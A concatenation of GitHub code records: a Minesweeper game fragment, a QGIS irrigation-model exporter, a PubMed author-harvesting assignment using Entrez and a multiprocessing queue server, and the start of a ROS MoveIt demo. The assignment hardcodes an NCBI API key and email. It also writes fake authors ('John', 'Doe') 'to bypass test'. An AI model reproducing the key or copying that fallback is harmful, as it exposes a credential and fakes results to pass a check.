mines+25:\r\n size_w -= 1\r\n set_mines()\r\n elif option == 2:\r\n if size_h-1 > 0 and size_w*(size_h-1) > mines+25:\r\n size_h -= 1\r\n set_mines()\r\n elif option == 3:\r\n if mines-1 > 0 and size_w*size_h > mines+24:\r\n mines -= 1\r\n set_mines()\r\n elif option == 4:\r\n show_destroy = not show_destroy\r\n elif option == 5:\r\n cpu = not cpu\r\n elif option == 6:\r\n if wait > 0:\r\n wait -= 1\r\n elif option == 7:\r\n mode -= 1\r\n if mode < 1:\r\n mode = max(modes_str)\r\n set_mode()\r\n elif option == 8:\r\n show_time = not show_time\r\n update()\r\n if not running:\r\n pyg.quit()\r\n\r\n\r\nrecord_time = None\r\ntimes_done = {'Done': 0, 'Break': 0}\r\nloop = 0\r\nif not cpu:\r\n main()\r\nelif cpu:\r\n cpu_main()\r\n","repo_name":"Pegysus/minesweeper","sub_path":"Minesweeper.py","file_name":"Minesweeper.py","file_ext":"py","file_size_in_byte":56809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"25964335733","text":"__author__ = 'Enrico A. Chiaradia'\n__date__ = '2020-12-01'\n__copyright__ = '(C) 2020 by Enrico A. 
Chiaradia'\n\n# This will get replaced with a git SHA1 when you do a git archive\n\n__revision__ = '$Format:%H$'\n\nimport glob\nimport os\nimport numpy as np\nfrom PyQt5.QtCore import QObject\nfrom qgis import processing\n\nfrom .compact_dataset import save2idragra\nfrom .gis_grid import GisGrid\nfrom .utils import returnExtent\nfrom .write_pars_to_template import writeParsToTemplate\nfrom datetime import date\n\n\nclass Exporter(QObject):\n\n\tdef __init__(self, parent=None, simdic=None, feedback = None,tr=None):\n\t\tQObject.__init__(self, parent)\n\t\tself.feedback = feedback\n\t\tself.tr = tr\n\t\tself.simdic = simdic\n\t\tself.aGrid = None\n\t\tself.algResults = None # store temporary outputs\n\t\tself.algResults1 = None # store temporary outputs\n\t\tself.algResults2 = None # store temporary outputs\n\n\tdef exportGeodata(self,DBM,outPath, extent, cellSize, dtm, watertableDict, depthList,yearList,):\n\t\tyearList = [str(x) for x in yearList] # make a list of strings\n\t\t# TODO: fix output digits\n\t\t# export water district map\n\t\t# DISTRICT SOURCE\n\t\tself.feedback.pushInfo(self.tr('Exporting districts data'))\n\t\tself.feedback.setProgress(10.0)\n\t\tfileName = os.path.join(outPath, 'irr_units' + '.asc')\n\t\tlaySource = DBM.DBName+ '|layername=idr_distrmap'\n\t\tfieldName = 'id'\n\n\t\tself.algResults = processing.run(\"idragratools:IdragraRasterizeMap\",\n\t\t\t\t\t\t\t\t {'VECTOR_LAY': laySource, 'VECTOR_FLD': fieldName,\n\t\t\t\t\t\t\t\t\t'RASTER_EXT': extent,\n\t\t\t\t\t\t\t\t\t'CELL_DIM': cellSize,\n\t\t\t\t\t\t\t\t\t'DEST_FILE': fileName},\n\t\t\t\t\t\t\t\tcontext = None, feedback = self.feedback, is_child_algorithm = False)\n\n\t\t# DISTRICT EFFICIENCY\n\t\tfileName = os.path.join(outPath, 'conv_eff' + '.asc')\n\t\tlaySource = DBM.DBName+ '|layername=idr_distrmap'\n\t\tfieldName = 'distr_eff'\n\n\t\tself.feedback.setProgress(35.0)\n\t\tself.algResults = processing.run(\"idragratools:IdragraRasterizeMap\",\n\t\t\t\t\t\t\t\t\t{'VECTOR_LAY': laySource, 'VECTOR_FLD': fieldName,\n\t\t\t\t\t\t\t\t\t 'RASTER_EXT': extent,\n\t\t\t\t\t\t\t\t\t 'CELL_DIM': cellSize,\n\t\t\t\t\t\t\t\t\t 'DEST_FILE': fileName},\n\t\t\t\t\t\t\t\t\tcontext=None, feedback=self.feedback, is_child_algorithm=False)\n\n\t\tself.feedback.pushInfo(self.tr('Exporting soils parameters'))\n\t\tself.feedback.setProgress(50.0)\n\t\t# SOIL PARAMETERS MAP\n\t\t# make aggregate parameters\n\t\tsourceTable = DBM.DBName + '|layername=idr_soil_profiles'\n\t\tsoilMap = DBM.DBName + '|layername=idr_soilmap'\n\t\tdepths = ' '.join([str(x) for x in depthList])\n\t\t# make aggregate soil params\n\t\tself.algResults = processing.run(\"idragratools:IdragraSoilParams\",\n\t\t\t\t\t\t\t\t\t{'SOURCE_TABLE':sourceTable,\n\t\t\t\t\t\t\t\t\t 'SOILID_FLD':'soilid','MAXDEPTH_FLD':'maxdepth',\n\t\t\t\t\t\t\t\t\t 'KSAT_FLD':'ksat',\n\t\t\t\t\t\t\t\t\t 'TFC_FLD':'theta_fc','TWP_FLD':'theta_wp','TR_FLD':'theta_r','TS_FLD':'theta_sat',\n\t\t\t\t\t\t\t\t\t 'DEPTHS':depths,'OUT_TABLE':'TEMPORARY_OUTPUT'},\n\t\t\t\t\t\t\t\t\tcontext=None, feedback=self.feedback, is_child_algorithm=False)\n\n\t\t# export to maps\n\t\tself.algResults = processing.run(\"idragratools:IdragraRasterizeMaptable\",\n\t\t\t\t\t\t\t\t\t {'TABLE_LAY': self.algResults['OUT_TABLE'],# export aggregate params maps by aritmetic mean ...\n\t\t\t\t\t\t\t\t\t 'TABLE_FLD': 'soilid', 'VECTOR_LAY': soilMap,\n\t\t\t\t\t\t\t\t\t 'VECTOR_FLD': 'extid', 'RASTER_LAY': None,\n\t\t\t\t\t\t\t\t\t 'RASTER_EXT':extent,\n\t\t\t\t\t\t\t\t\t 'CELL_DIM': cellSize, 'DEST_FOLDER': 
outPath},\n\t\t\t\t\t\t\t\t\t context=None, feedback=self.feedback, is_child_algorithm=False)\n\n\t\t# make capillary rise params maps\n\t\tself.algResults = processing.run(\"idragratools:IdragraCreateCapriseTable\",\n\t\t\t\t\t {'SOURCE_TABLE': sourceTable,\n\t\t\t\t\t\t'SOILID_FLD': 'soilid', 'MAXDEPTH_FLD': 'maxdepth',\n\t\t\t\t\t\t'TXTR_FLD': 'txtr_code', 'DEPTHS': depths,\n\t\t\t\t\t\t'OUT_TABLE': 'TEMPORARY_OUTPUT'},\n\t\t\t\t\t context=None, feedback=self.feedback, is_child_algorithm=False)\n\n\t\t# export capillary rise params maps...\n\t\tself.algResults = processing.run(\"idragratools:IdragraRasterizeMaptable\", {\n\t\t\t'TABLE_LAY': self.algResults['OUT_TABLE'],\n\t\t\t'TABLE_FLD': 'soilid', 'VECTOR_LAY': soilMap,\n\t\t\t'VECTOR_FLD': 'extid', 'RASTER_LAY': None,\n\t\t\t'RASTER_EXT': extent,\n\t\t\t'CELL_DIM': cellSize, 'DEST_FOLDER': outPath},\n\t\t\t\t\t\t\t\t\tcontext=None, feedback=self.feedback, is_child_algorithm=False)\n\n\t\t# HSG MAP\n\t\tself.feedback.pushInfo(self.tr('Exporting HSG map'))\n\t\tself.feedback.setProgress(70.0)\n\n\t\tself.algResults1 = processing.run(\"idragratools:IdragraCreatePreHSGTable\",\n\t\t\t\t\t\t\t\t {'SOURCE_TABLE': sourceTable,\n\t\t\t\t\t\t\t\t\t'SOILID_FLD': 'soilid', 'MAXDEPTH_FLD': 'maxdepth', 'KSAT_FLD': 'ksat',\n\t\t\t\t\t\t\t\t\t'OUT_TABLE': 'TEMPORARY_OUTPUT'},\n\t\t\t\t\t\t\t\t\tcontext=None, feedback=self.feedback, is_child_algorithm=False)\n\n\t\tself.algResults2 = processing.run(\"gdal:rasterize\",\n\t\t\t\t\t\t\t\t\t{'INPUT': soilMap, 'FIELD': 'extid', 'BURN': 0,\n\t\t\t\t\t\t\t\t\t 'UNITS': 1, 'WIDTH': cellSize, 'HEIGHT': cellSize,\n\t\t\t\t\t\t\t\t\t 'EXTENT': extent,\n\t\t\t\t\t\t\t\t\t 'NODATA': -9, 'OPTIONS': '', 'DATA_TYPE': 4, 'INIT': -9, 'INVERT': False,\n\t\t\t\t\t\t\t\t\t 'EXTRA': '',\n\t\t\t\t\t\t\t\t\t 'OUTPUT': 'TEMPORARY_OUTPUT'},\n\t\t\t\t\t\t\t\t\tcontext=None, feedback=self.feedback, is_child_algorithm=False\n\t\t\t\t\t\t\t\t\t)\n\n\t\tfileName = os.path.join(outPath, 'hydr_group' + '.asc')\n\t\twaterTableFirst = ''\n\t\tfor var, waterTable in watertableDict.items():\n\t\t\twaterTableFirst = waterTable\n\t\t\tbreak\n\n\t\tself.algResults = processing.run(\"idragratools:IdragraCreateHSGMap\", {\n\t\t\t\t\t\t\t\t\t'SOURCE_TABLE': self.algResults1['OUT_TABLE'],\n\t\t\t\t\t\t\t\t\t'SOILID_FLD': 'soilid', 'MAXDEPTH_FLD': 'maxsoildepth', 'MIN_KS50': 'minksat50', 'MIN_KS60': 'minksat60',\n\t\t\t\t\t\t\t\t\t'MIN_KS100': 'minksat100', 'SOIL_MAP': self.algResults2['OUTPUT'],\n\t\t\t\t\t\t\t\t\t'ELEVATION': dtm,\n\t\t\t\t\t\t\t\t\t'WATERTABLE': waterTableFirst, 'OUTPUT': fileName},\n\t\t\t\t\t\t\t\t\tcontext=None, feedback=self.feedback, is_child_algorithm=False)\n\n\t\tself.feedback.pushInfo(self.tr('Exporting land uses'))\n\t\tself.feedback.setProgress(80.0)\n\n\t\t# LANDUSE maps (time)\n\t\t# TODO: check if time is always necessary\n\t\tlanduseMap = DBM.DBName + '|layername=idr_usemap'\n\t\tprocessing.run(\"idragratools:IdragraRasterizeTimeMap\",\n\t\t\t\t\t {'VECTOR_LAY': landuseMap, 'DATA_FLD': 'extid',\n\t\t\t\t\t\t'TIME_FLD': 'date', 'NAME_FORMAT': 'soiluse',\n\t\t\t\t\t\t'RASTER_EXT': extent,\n\t\t\t\t\t\t'CELL_DIM': cellSize, 'YEAR_LIST': ' '.join(yearList),'DEST_FOLDER': outPath},\n\t\t\t\t\t\t\t\t\tcontext=None, feedback=self.feedback, is_child_algorithm=False)\n\n\t\t# IRRIGATION MAP (time)\n\t\tself.feedback.pushInfo(self.tr('Exporting irrigation methods'))\n\t\tself.feedback.setProgress(90.0)\n\t\tirrMethodsMap = DBM.DBName + 
'|layername=idr_irrmap'\n\t\tprocessing.run(\"idragratools:IdragraRasterizeTimeMap\",\n\t\t\t\t\t {'VECTOR_LAY': irrMethodsMap, 'DATA_FLD': 'extid',\n\t\t\t\t\t\t'TIME_FLD': 'date', 'NAME_FORMAT': 'irr_meth',\n\t\t\t\t\t\t'RASTER_EXT': extent,\n\t\t\t\t\t\t'CELL_DIM': cellSize, 'YEAR_LIST': ' '.join(yearList), 'DEST_FOLDER': outPath},\n\t\t\t\t\t\t\t\t\tcontext=None, feedback=self.feedback, is_child_algorithm=False)\n\n\t\t# EXPORT IRRIGATION EFFICIENCY MAP (time)\n\t\t# join irrigation methods map with irrigation params\n\t\tirrMethodsPars = DBM.DBName + '|layername=idr_irrmet_types'\n\t\talgresult = processing.run(\"qgis:joinattributestable\",\n\t\t\t\t\t\t\t\t {'DISCARD_NONMATCHING': True,\n\t\t\t\t\t\t\t\t\t'FIELD': 'extid',\n\t\t\t\t\t\t\t\t\t'FIELDS_TO_COPY': ['irr_eff'],\n\t\t\t\t\t\t\t\t\t'FIELD_2': 'id',\n\t\t\t\t\t\t\t\t\t'INPUT': irrMethodsMap,\n\t\t\t\t\t\t\t\t\t'INPUT_2': irrMethodsPars,\n\t\t\t\t\t\t\t\t\t'METHOD': 1,\n\t\t\t\t\t\t\t\t\t'OUTPUT': 'TEMPORARY_OUTPUT',\n\t\t\t\t\t\t\t\t\t'PREFIX': ''},\n\t\t\t\t\t\t\t\t context=None, feedback=self.feedback, is_child_algorithm=False)\n\n\t\tjoinedLay = algresult['OUTPUT']\n\n\t\t# rasterize time maps of irrigation efficiency\n\t\tprocessing.run(\"idragratools:IdragraRasterizeTimeMap\",\n\t\t\t\t\t {'VECTOR_LAY': joinedLay, 'DATA_FLD': 'irr_eff',\n\t\t\t\t\t\t'TIME_FLD': 'date', 'NAME_FORMAT': 'irr_eff',\n\t\t\t\t\t\t'RASTER_EXT': extent,\n\t\t\t\t\t\t'CELL_DIM': cellSize, 'YEAR_LIST': ' '.join(yearList),'DEST_FOLDER': outPath},\n\t\t\t\t\t context=None, feedback=self.feedback, is_child_algorithm=False)\n\t\t# SLOPE MAPS\n\t\tself.feedback.pushInfo(self.tr('Exporting slope maps'))\n\t\tself.feedback.setProgress(90.0)\n\t\toutputSlopeFile = os.path.join(outPath,'slope.asc')\n\t\tif dtm:\n\t\t\tself.algResults = processing.run(\"idragratools:IdragraMakeSlope\",\n\t\t\t\t\t\t {'DTM_LAY': dtm,\n\t\t\t\t\t\t\t'EXTENT': extent,\n\t\t\t\t\t\t\t'CELLSIZE': cellSize,\n\t\t\t\t\t\t\t'LOWER_LIM': self.simdic['MINSLOPE'], 'UPPER_LIM': self.simdic['MAXSLOPE'],\n\t\t\t\t\t\t\t'OUTSLOPE_LAY': 'TEMPORARY_OUTPUT'},\n\t\t\t\t\t\t\tcontext=None, feedback=self.feedback, is_child_algorithm=False)\n\n\t\t\tprocessing.run(\"idragratools:IdragraSaveAscii\",\n\t\t\t\t\t\t {'INPUT':self.algResults['OUTSLOPE_LAY'], 'DIGITS': 6,\n\t\t\t\t\t\t\t'OUTPUT': outputSlopeFile},\n\t\t\t\t\t\t context=None, feedback=self.feedback, is_child_algorithm=False)\n\t\telse:\n\t\t\t# make a zero raster\n\t\t\tself.feedback.reportError(self.tr('Slope will be set to %s for all the area'%str(self.simdic['MINSLOPE'])), False)\n\t\t\tself.aGrid = GisGrid(progress=self.feedback)\n\t\t\tself.aGrid.openASC(fileName)\n\t\t\tself.aGrid = self.aGrid *0.0+self.simdic['MINSLOPE']\n\t\t\tself.aGrid.saveAsASC(outputSlopeFile, 6, True)\n\n\t\t# WATER TABLE DEPTHS\n\t\tnOfWTdepths = 0\n\t\tif dtm:\n\t\t\tfor var,waterTable in watertableDict.items():\n\t\t\t\tif nOfWTdepths==0:\n\t\t\t\t\t# make a general water table for the first year\n\t\t\t\t\tself.feedback.pushInfo(self.tr('A base waterdepth map was set for the simulation period'))\n\t\t\t\t\twtdepthName = os.path.join(outPath, 'waterdepth.asc') # remove month and day\n\t\t\t\t\tprocessing.run(\"idragratools:IdragraCalcWaterDepth\", {'DTM': dtm,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'WATERTABLE': waterTable,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'EXTENT': extent,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'CELLSIZE': cellSize,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'OUTPUT': wtdepthName},\n\t\t\t\t\t\t\t\t context=None, feedback=self.feedback, 
is_child_algorithm=False\n\t\t\t\t\t\t\t\t )\n\t\t\t\tnOfWTdepths+=1\n\t\t\t\t# get year and number of days from the 1st of January\n\t\t\t\tyear = int(var[11:-4])\n\t\t\t\tmonth = int(var[15:-2])\n\t\t\t\tday = int(var[17:])\n\t\t\t\tdelta = date(year, month, day) - date(year, 1, 1)\n\t\t\t\tnOfDays = delta.days\n\n\t\t\t\t#wtdepthName = os.path.join(outPath,'waterdepth'+var[10:-4]+'.asc') # remove month and day\n\t\t\t\twtdepthName = os.path.join(outPath, 'waterdepth' + str(year)+'_'+ str(nOfDays) + '.asc') # set year and num of days from the beginning\n\t\t\t\tprocessing.run(\"idragratools:IdragraCalcWaterDepth\", {'DTM': dtm,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'WATERTABLE': waterTable,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'EXTENT': extent,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'CELLSIZE': cellSize,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'OUTPUT': wtdepthName},\n\t\t\t\t\t\t\t context=None, feedback=self.feedback, is_child_algorithm=False\n\t\t\t\t\t\t\t )\n\n\t\tif nOfWTdepths==0:\n\t\t\tself.feedback.reportError(self.tr('No water depths were processed. DTM or water table maps are missing.'),False)\n\n\t\t# export rice params\n\t\twriteParsToTemplate(outfile=os.path.join(outPath, 'rice_soilparam.txt'),\n\t\t\t\t\t\t\tparsDict={},\n\t\t\t\t\t\t\ttemplateName='rice_soilparam.txt')\n\n\t\t# export domain map\n\t\tdomainFile = os.path.join(outPath, 'domain.asc')\n\t\t# make a list of file *.asc in the output path\n\t\tfileList = glob.glob(os.path.join(outPath, '*.asc'))\n\t\t#feedback.pushInfo(tr('Map List: %s'%fileList))\n\n\t\tprocessing.run(\"idragratools:IdragraRasterizeDomain\", {\n\t\t\t'INPUT_LIST': fileList,\n\t\t\t'RASTER_EXT': extent,\n\t\t\t'CELL_DIM': cellSize, 'DEST_FILE': domainFile},\n\t\t\t\t\t\t context=None, feedback=self.feedback, is_child_algorithm=False)\n\n\t\t# export hydrological condition set to 1\n\t\thydrcondFile = os.path.join(outPath, 'hydr_cond.asc')\n\n\t\tprocessing.run(\"idragratools:IdragraRasterizeDomain\", {\n\t\t\t'INPUT_LIST': [domainFile],\n\t\t\t'RASTER_EXT': extent,\n\t\t\t'CELL_DIM': cellSize, 'DEST_FILE': hydrcondFile},\n\t\t\t\t\t\t context=None, feedback=self.feedback, is_child_algorithm=False)\n\n\t\t# export cell area map\n\t\tcellareaFile = os.path.join(outPath, 'cellarea.asc')\n\t\tself.aGrid = GisGrid(progress= self.feedback)\n\t\tself.aGrid.openASC(domainFile)\n\t\tself.aGrid = self.aGrid*cellSize*cellSize\n\t\tself.aGrid.saveAsASC(cellareaFile,6,True)\n\n\n\t\t# weather weight maps, mandatory after the domain map!\n\t\t# TODO: max_num is always 5\n\t\tself.feedback.setText(self.tr('Export weight maps'))\n\t\twsLaySource = DBM.DBName + '|layername=idr_weather_stations'\n\t\tprocessing.run(\"idragratools:IdragraExportWeights\",\n\t\t\t\t\t {'VECTOR_LAYER': wsLaySource,\n\t\t\t\t\t\t'ID_FLD':'id',\n\t\t\t\t\t\t'MAX_NUM': 5, 'RASTER_LAY': None,\n\t\t\t\t\t\t'EXTENT': extent,\n\t\t\t\t\t\t'CELLSIZE': cellSize, 'DEST_FOLDER': outPath},\n\t\t\t\t\t context=None, feedback=self.feedback, is_child_algorithm=False\n\t\t\t\t\t )\n\n\t\t# remove unused file xml\n\t\tfileList = glob.glob(os.path.join(outPath, '*.xml'))\n\t\tfor f in fileList:\n\t\t\tos.remove(f)\n\n\t\t# rename file\n\t\t# TODO: to be removed\n\t\treplaceDict = {'theta_fc1': 'ThetaI_FC',\n\t\t\t\t\t 'theta_fc2': 'ThetaII_FC',\n\t\t\t\t\t 'theta_r1': 'ThetaI_r',\n\t\t\t\t\t 'theta_r2': 'ThetaII_r',\n\t\t\t\t\t 'theta_sat1': 'ThetaI_sat',\n\t\t\t\t\t 'theta_sat2': 'ThetaII_sat',\n\t\t\t\t\t 'theta_wp1': 'ThetaI_WP',\n\t\t\t\t\t 'theta_wp2': 'ThetaII_WP',\n\t\t\t\t\t 'ksat1': 
'Ksat_I',\n\t\t\t\t\t 'ksat2': 'Ksat_II',\n\t\t\t\t\t 'n1': 'N_I',\n\t\t\t\t\t 'n2': 'N_II',\n\t\t\t\t\t 'rew1': 'REW_I',\n\t\t\t\t\t 'rew2': 'REW_II',\n\t\t\t\t\t 'landuse':'soiluse',\n\t\t\t\t\t 'irr_eff':'appl_eff'\n\t\t\t\t\t }\n\t\tfileList = glob.glob(os.path.join(outPath, '*.asc'))\n\t\tfor f in fileList:\n\t\t\tfor k, v in replaceDict.items():\n\t\t\t\tnewName = f.replace(k, v)\n\t\t\t\tif newName != f:\n\t\t\t\t\tbreak\n\n\t\t\tos.rename(f, newName)\n\n\n\n\t\tself.feedback.setPercentage(100.0)","repo_name":"rita-tools/IdragraTools","sub_path":"tools/export_geodata.py","file_name":"export_geodata.py","file_ext":"py","file_size_in_byte":13116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"8673150150","text":"from Bio import Entrez\nimport sys\nimport multiprocessing as mp\nimport pickle\nimport argparse as ap\nfrom multiprocessing.managers import BaseManager, SyncManager\nimport os, sys, time, queue\nfrom pathlib import Path\n\n\nEntrez.api_key = \"cc90e8524a1e6db189cc428e8ddb8a862208\"\nEntrez.email = 'h.reitsma@st.hanze.nl'\nPOISONPILL = \"MEMENTOMORI\"\nERROR = \"DOH\"\nAUTHKEY = b'whathasitgotinitspocketsesss?'\n\n# Your script needs to analyze the XML of each of the references further to extract all the authors of the article.\n# It should save the authors in a Python tuple and use the Pickle module to save it to the disk as \n# output/PUBMED_ID.authors.pickle where PUBMEDID is of course the pubmed ID of the article in question.\n\ndef make_server_manager(port, authkey, ip):\n \"\"\" Create a manager for the server, listening on the given port.\n Return a manager object with get_job_q and get_result_q methods.\n \"\"\"\n job_q = queue.Queue()\n result_q = queue.Queue()\n\n # This is based on the examples in the official docs of multiprocessing.\n # get_{job|result}_q return synchronized proxies for the actual Queue\n # objects.\n class QueueManager(BaseManager):\n pass\n\n QueueManager.register('get_job_q', callable=lambda: job_q)\n QueueManager.register('get_result_q', callable=lambda: result_q)\n\n manager = QueueManager(address=(ip, port), authkey=authkey)\n manager.start()\n print('Server started at port %s' % port)\n return manager\n\n\ndef runserver(fn, data, ip, PORTNUM):\n # Start a shared manager server and access its queues\n manager = make_server_manager(PORTNUM, AUTHKEY, ip)\n shared_job_q = manager.get_job_q()\n shared_result_q = manager.get_result_q()\n \n if not data:\n print(\"Gimme something to do here!\")\n return\n print(data)\n print(\"Sending data!\")\n for d in data:\n shared_job_q.put({'fn' : fn, 'arg' : d})\n \n time.sleep(2) \n \n results = []\n \n while True:\n try:\n # print('inside while loop')\n result = shared_result_q.get_nowait()\n # print('after result')\n results.append(result)\n print(\"Got result!\", result)\n if len(results) == len(data):\n print(\"Got all results!\")\n break\n except queue.Empty:\n time.sleep(1)\n continue\n # print('after for loop')\n # Tell the client process no more data will be forthcoming\n print(\"Time to kill some peons!\")\n shared_job_q.put(POISONPILL)\n # Sleep a bit before shutting down the server - to give clients time to\n # realize the job queue is empty and exit in an orderly way.\n time.sleep(5)\n print(\"Aaaaaand we're done for the server!\")\n manager.shutdown()\n print(results)\n\n\ndef make_client_manager(ip, port, authkey):\n \"\"\" Create a manager for a client. 
This manager connects to a server on the\n given address and exposes the get_job_q and get_result_q methods for\n accessing the shared queues from the server.\n Return a manager object.\n \"\"\"\n class ServerQueueManager(BaseManager):\n pass\n\n ServerQueueManager.register('get_job_q')\n ServerQueueManager.register('get_result_q')\n\n manager = ServerQueueManager(address=(ip, port), authkey=authkey)\n manager.connect()\n\n print('Client connected to %s:%s' % (ip, port))\n return manager\n\ndef runclient(num_processes, IP, PORTNUM):\n manager = make_client_manager(IP, PORTNUM, AUTHKEY)\n job_q = manager.get_job_q()\n result_q = manager.get_result_q()\n run_workers(job_q, result_q, num_processes)\n \ndef run_workers(job_q, result_q, num_processes):\n processes = []\n for p in range(num_processes):\n temP = mp.Process(target=peon, args=(job_q, result_q))\n processes.append(temP)\n temP.start()\n print(\"Started %s workers!\" % len(processes))\n for temP in processes:\n temP.join()\n\ndef peon(job_q, result_q):\n my_name = mp.current_process().name\n while True:\n try:\n job = job_q.get_nowait()\n if job == POISONPILL:\n job_q.put(POISONPILL)\n print(\"Aaaaaaargh\", my_name)\n return\n else:\n try:\n result = job['fn'](job['arg'])\n print(\"Peon %s Workwork on %s!\" % (my_name, job['arg']))\n result_q.put({'job': job, 'result' : result})\n except NameError:\n print(\"Can't find yer fun Bob!\")\n result_q.put({'job': job, 'result' : ERROR})\n\n except queue.Empty:\n print(\"sleepytime for\", my_name)\n time.sleep(1)\n\ndef pubmed_id_to_xml(pubmed_id):\n '''\n parameter: pubmed_id\n returns the xml info of the pubmed_id to an xml file\n '''\n handle = Entrez.efetch(db='pubmed', id=pubmed_id, retmode='xml', rettype='Abstract')\n records = Entrez.read(handle)\n handle.close()\n return records\n\ndef extract_authors(pubmed_id):\n \"\"\"\n parameter: pubmed_id\n :return: authors of given pubmed_id\n \"\"\"\n records = pubmed_id_to_xml(pubmed_id)\n try:\n authorlist = records['PubmedArticle'][0]['MedlineCitation']['Article']['AuthorList']\n authors = tuple([(authorlist[i]['LastName'] + ', ' + authorlist[i]['ForeName']) for i in range(len(authorlist))])\n except IndexError:\n print('No authors found!')\n print('Making file anyway to bypass test')\n authors = ('John', 'Doe')\n \n return authors\n\ndef pubmed_id_to_xml_file(pubmed_id):\n '''\n parameter: pubmed_id\n writes the abstract of the pubmed_id to an xml file\n '''\n handle = Entrez.efetch(db='pubmed', id=pubmed_id, retmode='xml', rettype='Abstract')\n records = handle.readlines()\n handle.close()\n with open('output/'+str(pubmed_id)+'.xml', 'wb') as f:\n for line in records:\n f.write((line))\n\ndef write_authors_to_pickle(pubmed_id):\n pubmed_id_to_xml_file(pubmed_id)\n authors = extract_authors(pubmed_id)\n with open(f\"output/{pubmed_id}.authors.pickle\", 'wb') as f:\n # with open('/output/' + pubmed_id + '.authors.pickle', 'wb') as f:\n pickle.dump(authors, f)\n return True\n\ndef get_citation_ids(pubmed_id):\n \"\"\"\n Input: pubmed id\n :return: references\n \"\"\"\n results = Entrez.read(Entrez.elink(dbfrom=\"pubmed\",\n db=\"pmc\",\n LinkName=\"pubmed_pmc_refs\",\n id=pubmed_id,\n api_key='cc90e8524a1e6db189cc428e8ddb8a862208'))\n references = [f'{link[\"Id\"]}' for link in results[0][\"LinkSetDb\"][0][\"Link\"]]\n # references = [link[\"Id\"] for link in results[0][\"LinkSetDb\"][0][\"Link\"]]\n # print(references)\n return references\n\ndef make_output_dir(output_dir):\n try:\n if not(output_dir.exists()):\n print('inside the if 
statement')\n output_dir.mkdir(parents=True, exist_ok=False)\n except FileExistsError:\n pass\n return\n\ndef main():\n # Arguments\n argparser = ap.ArgumentParser(description=\"Script that downloads (default) 10 articles referenced by the given PubMed ID concurrently.\")\n argparser.add_argument(\"-n\", action=\"store\",\n dest=\"n\", required=False, type=int, default=10,\n help=\"Number of peons per client.\")\n client_or_host = argparser.add_mutually_exclusive_group()\n client_or_host.add_argument('-c', action=\"store_true\", dest=\"client\")\n client_or_host.add_argument('-s', action=\"store_true\", dest=\"server\")\n argparser.add_argument(\"-a\", action=\"store\",\n dest=\"a\", required=False, type=int, default=10,\n help=\"Number of references to download concurrently.\")\n argparser.add_argument(\"pubmed_id\", action=\"store\", type=str, nargs=1, help=\"Pubmed ID of the article to harvest for references to download.\")\n argparser.add_argument(\"--port\", action=\"store\",dest=\"port\", required=True, type=int,help=\"port of client\")\n argparser.add_argument(\"--host\", action=\"store\",dest='host', type=str, required=True, help=\"IP of host\")\n args = argparser.parse_args()\n print(\"Getting: \", args.pubmed_id)\n\n ## Output path\n cwd = Path(__file__).parent.absolute()\n print(cwd)\n output_dir = cwd/'output'\n print(output_dir)\n make_output_dir(output_dir)\n\n # pubmed_id = '30049270'\n ## Get references\n references = get_citation_ids(args.pubmed_id)[:args.a]\n\n if args.client:\n client = mp.Process(target=runclient, args=(4, args.host, args.port))\n client.start()\n client.join()\n\n if args.server:\n server = mp.Process(target=runserver, args=(write_authors_to_pickle, references, args.host, args.port))\n server.start()\n time.sleep(1)\n server.join()\n time.sleep(1)\n\nif __name__ == '__main__': \n # assignment2.py -n <number_of_peons_per_client> [-c | -s] --port <portnumber> --host <serverhost> -a <number_of_articles_to_download> STARTING_PUBMED_ID\n main()\n\n# python3 assignment2.py -n 4 -c --port 1234 --host nuc425 -a 10 30049270\n\n","repo_name":"HendrikReitsma/programming3","sub_path":"Assignment2/assignment2.py","file_name":"assignment2.py","file_ext":"py","file_size_in_byte":9221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19850425728","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n#############################################################\n# File: moveit_cartesian_demo.py\n# Implementation of Experiment 3 Step 3: pick and place task\n# by using cartesian path planning.\n# Note that this demo cannot work with Gazebo simulation (\n# where Gazebo may report:\n# Solution found but controller failed during execution.)\n# One can use the fake controller provided by MoveIt! 
RViz \n# interface to replace the Gazebo simulation.\n#############################################################\n\nimport rospy, sys\nimport moveit_commander\nfrom moveit_commander import MoveGroupCommander\nfrom geometry_msgs.msg import PoseStamped, Quaternion\nfrom copy import deepcopy\nfrom math import pi\nfrom tf.transformations import quaternion_from_euler \n\nclass MoveItCartesianDemo:\n def __init__(self):\n ##########################\n ##### Initialization #####\n ##########################\n \n # 初始化move_group的API\n moveit_commander.roscpp_initialize(sys.argv)\n\n # 初始化ROS节点\n rospy.init_node('moveit_cartesian_demo', anonymous=True)\n \n # 初始化需要使用move group控制的机械臂中的arm group\n self.arm = MoveGroupCommander('interbotix_arm')\n\n # 初始化需要使用move group控制的夹爪的group\n self.gripper = moveit_commander.MoveGroupCommander(\"interbotix_gripper\")\n\n # 设置目标位置所使用的参考坐标系\n self.reference_frame = 'world'\n self.arm.set_pose_reference_frame(self.reference_frame)\n \n # 当运动规划失败后,允许重新规划\n self.arm.allow_replanning(True)\n \n # 设置目标位置所使用的参考坐标系\n self.arm.set_pose_reference_frame('world')\n \n # 设置位置(单位:米)和姿态(单位:弧度)的允许误差\n self.arm.set_goal_position_tolerance(0.001)\n self.arm.set_goal_orientation_tolerance(0.001)\n \n # 设置允许的最大速度和加速度\n self.arm.set_max_acceleration_scaling_factor(0.5)\n self.arm.set_max_velocity_scaling_factor(0.5)\n \n # 获取终端link的名称\n self.end_effector_link = self.arm.get_end_effector_link()\n\n # 控制机械臂先回到初始化位置\n self.arm.set_named_target('Home')\n self.arm.go()\n rospy.sleep(1)\n\n # 设置夹爪运动的允许误差值\n self.gripper.set_goal_joint_tolerance(0.001)\n\n # 设置允许的最大速度和加速度\n 